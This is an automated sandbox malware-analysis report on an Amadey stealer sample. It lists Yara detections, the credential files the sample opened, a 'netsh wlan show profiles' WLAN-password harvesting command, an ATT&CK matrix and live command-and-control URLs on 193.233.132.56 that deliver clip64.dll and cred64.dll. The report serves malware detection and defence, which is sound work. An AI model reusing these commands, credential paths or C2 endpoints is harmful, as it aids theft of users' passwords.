                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E2E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00E2E27A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_00866160 LookupAccountNameA,6_2_00866160

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Uses netsh to modify the Windows network and firewall settings
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                                Stealing of Sensitive Information

                                barindex
                                Yara detected Amadeys Clipper DLL
                                Source: Yara matchFile source: 11.2.rundll32.exe.6c980000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
                                Yara detected Amadeys stealer DLL
                                Source: Yara matchFile source: 11.2.rundll32.exe.6c980000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1798578952.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2311033083.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1844272709.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.1868196075.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                                Tries to harvest and steal WLAN passwords
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
                                Tries to harvest and steal ftp login credentials
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                                Tries to steal Instant Messenger accounts or passwords
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\OtntNNdpqYyQMUiSAQysCOlFcPDwPwakinULXKhkkyvGQAUcfRRvkfpLZMMaaOTCuIuDlXU\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008902D8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_008902D8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0088F5E1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_0088F5E1

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Disable or Modify Tools                                		2
                                OS Credential Dumping                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		12
                                Ingress Tool Transfer                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Command and Scripting Interpreter                                		1
                                Scheduled Task/Job                                		112
                                Process Injection                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Credentials in Registry                                		1
                                Account Discovery                                		Remote Desktop Protocol2
                                Data from Local System                                		1
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job                                		Logon Script (Windows)1
                                Scheduled Task/Job                                		3
                                Obfuscated Files or Information                                		1
                                Credentials In Files                                		2
                                File and Directory Discovery                                		SMB/Windows Admin SharesData from Network Shared Drive2
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                Software Packing                                		NTDS225
                                System Information Discovery                                		Distributed Component Object ModelInput Capture112
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets741
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                Masquerading                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                                Virtualization/Sandbox Evasion                                		DCSync251
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                                Process Injection                                		Proc Filesystem1
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Rundll32                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428513 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 13 other signatures 2->58 9 explorha.exe 18 2->9         started        14 explorha.exe 2->14         started        16 SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe 5 2->16         started        process3 dnsIp4 50 193.233.132.56, 49735, 49736, 49737 FREE-NET-ASFREEnetEU Russian Federation 9->50 38 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 9->38 dropped 40 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 9->40 dropped 42 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 9->42 dropped 44 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 9->44 dropped 76 Hides threads from debuggers 9->76 78 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->78 80 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 9->80 18 rundll32.exe 9->18         started        20 rundll32.exe 12 9->20         started        82 Antivirus detection for dropped file 14->82 84 Multi AV Scanner detection for dropped file 14->84 86 Detected unpacking (changes PE section rights) 14->86 94 3 other signatures 14->94 46 C:\Users\user\AppData\Local\...\explorha.exe, PE32 16->46 dropped 88 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->88 90 Tries to evade debugger and weak emulator (self modifying code) 16->90 92 Tries to detect virtualization through RDTSC time measurements 16->92 23 explorha.exe 16->23         started        file5 signatures6 process7 signatures8 25 rundll32.exe 25 18->25         started        60 System process connects to network (likely due to code injection or exploit) 20->60 62 Hides threads from debuggers 23->62 64 Tries to detect sandboxes / dynamic malware analysis system (registry check) 23->64 66 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 23->66 process9 signatures10 68 Tries to steal Instant Messenger accounts or passwords 25->68 70 Uses netsh to modify the Windows network and firewall settings 25->70 72 Tries to harvest and steal ftp login credentials 25->72 74 2 other signatures 25->74 28 powershell.exe 26 25->28         started        32 netsh.exe 2 25->32         started        process11 file12 48 C:\Users\user\...\246122658369_Desktop.zip, Zip 28->48 dropped 96 Loading BitLocker PowerShell Module 28->96 34 conhost.exe 28->34         started        36 conhost.exe 32->36         started        signatures13 process14

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe45%ReversingLabsWin32.Trojan.Generic
                                SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe54%VirustotalBrowse
                                SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe100%AviraTR/Crypt.TPM.Gen
                                SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll100%AviraTR/ClipBanker.pjgxt
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll100%AviraTR/PSW.Agent.szlsq
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll100%AviraTR/ClipBanker.pjgxt
                                C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll100%AviraTR/PSW.Agent.szlsq
                                C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll71%ReversingLabsWin64.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll78%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll82%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll80%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe45%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe54%VirustotalBrowse
                                C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll82%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll80%VirustotalBrowse
                                C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll71%ReversingLabsWin64.Trojan.Amadey
                                C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll78%VirustotalBrowse

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                                https://contoso.com/License0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                http://193.233.132.56/Pneh2sXQk0/index.phpd4%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.phpg5%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.phpk4%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllv20%VirustotalBrowse
                                http://193.233.132.56/l18%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php?wal=14%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll21%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.phpded4%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php21%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php35%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll22%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s20%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php-4%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php24%VirustotalBrowse
                                http://193.233.132.56/20%VirustotalBrowse
                                http://193.233.132.56/Pneh2sXQk0/index.php64%VirustotalBrowse

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://193.233.132.56/Pneh2sXQk0/index.phptrueunknown
                                http://193.233.132.56/Pneh2sXQk0/index.php?wal=1trueunknown
                                http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dlltrueunknown
                                http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dlltrueunknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
